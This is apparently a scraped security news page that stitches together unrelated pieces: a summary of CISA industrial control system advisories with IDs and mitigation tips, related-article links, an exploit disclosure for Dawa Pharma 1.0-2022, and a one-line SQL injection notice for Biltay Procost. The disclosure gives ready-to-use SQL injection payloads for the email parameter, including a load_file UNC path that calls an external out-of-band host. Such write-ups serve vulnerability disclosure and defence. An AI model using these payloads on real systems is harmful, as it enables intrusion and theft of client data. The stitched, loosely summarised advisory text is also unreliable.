CISA encourages users and administrators of ICS systems to review the newly released advisories for technical details and mitigations. Here are some of the key vulnerabilities identified in the CISA advisories:

*   **Siemens SIMATIC CP products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a remote code execution attack.
*   **Siemens SCALANCE W1750D:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Siemens SICAM A8000 Devices:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.
*   **Mitsubishi Electric MELSEC-F Series:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a cross-site scripting (XSS) attack.
*   **Hikvision Access Control and Intercom Products:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a buffer overflow attack.
*   **Schneider Electric IGSS:** This vulnerability could allow an attacker to gain unauthorized access to ICS systems through a SQL injection attack.

ICSA-23-285-08 Siemens SINEC NMS
ICSA-23-285-15 Advantech WebAccess
ICSA-23-285-06 Siemens SICAM PAS/PQS
ICSA-23-285-16 Schneider Electric IGSS
ICSA-23-285-02 Siemens SCALANCE W1750D
ICSA-23-285-07 Siemens RUGGEDCOM APE180
ICSA-23-285-05 Siemens Simcenter Amesim
ICSA-23-285-12 Weintek cMT3000 HMI Web CGI
ICSA-23-285-03 Siemens SICAM A8000 Devices
ICSA-23-285-01 Siemens SIMATIC CP products
ICSMA-23-285-02 Santesoft Sante FFT Imaging
ICSA-23-285-04 Siemens Xpedition Layout Browser
ICSMA-23-285-01 Santesoft Sante DICOM Viewer Pro
ICSA-23-243-03 PTC Kepware KepServerEX (Update A)
ICSA-23-285-10 Siemens Tecnomatix Plant Simulation 
ICSA-23-285-13 Mitsubishi Electric MELSEC-F Series
ICSA-23-285-11 Siemens Mendix Forgot Password Module
ICSA-23-285-14 Hikvision Access Control and Intercom Products
ICSA-23-285-09 Siemens CPCI85 Firmware of SICAM A8000 Devices

CISA recommends that users and administrators of ICS systems take the following steps to mitigate these vulnerabilities:

*   Monitor ICS systems for suspicious activity.
*   Develop and implement an incident response plan.
*   Apply security patches from vendors as soon as they are available.
*   Implement a layered security approach that includes network segmentation, firewalls, and intrusion detection systems.

ICS systems are used to control critical infrastructure, such as power grids, water treatment systems, and transportation networks. A successful cyber attack on an ICS system could have devastating consequences.

It is important for users and administrators of ICS systems to take steps to mitigate the vulnerabilities identified in the CISA advisories. In addition to the steps recommended by CISA, organizations that operate ICS systems should also consider the following:

*   Conduct regular security assessments of ICS systems to identify and address vulnerabilities.
*   Develop and implement a security awareness training program for employees who use ICS systems.
*   Keep ICS systems isolated from the internet and other untrusted networks.
*   Use strong passwords and enable multi-factor authentication for all ICS systems.

By taking these steps, organizations can protect their ICS systems from cyberattacks, especially the increasingly prevalent cybersecurity threat of ransomware attacks, and minimize the risk of disruption to their operations.

****_RELATED ARTICLES_****

1.  CISA Publishes List of Free Cybersecurity Tools and Services
2.  Major ransomware attack cripples largest gas pipeline in the US
3.  GreyEnergy: New malware targeting energy sector with espionage
4.  Siemens ALM 0-Day Vulnerabilities Posed Full Remote Takeover Risk
5.  Crit.IX: Flaws in Honeywell Experion DCS, Posing Risk to Critical Industries

New CISA Advisories Highlight Vulnerabilities in Top ICS Products

Dawa Pharma version 1.0-2022 suffers from a remote SQL injection vulnerability.

    ## Title: dawa-pharma-1.0-2022 Multiple-SQLi## Author: nu11secur1ty## Date: 10/12/2023## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all the information for the clientsof this application from the server, and very sensitive informationfor accessing the server by exploiting the vulnerability.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mayuri.infospace@gmail.com'+(selectload_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--VRdC&password=mayurik&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/10/dawa-pharma-10-2022-multiple-sqli.html)## Time spent:00:37:00

Dawa Pharma 1.0-2022 SQL Injection

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Biltay Technology Procost allows SQL Injection, Command Line Execution through SQL Injection.This issue affects Procost: before 1390.



Tag

#sql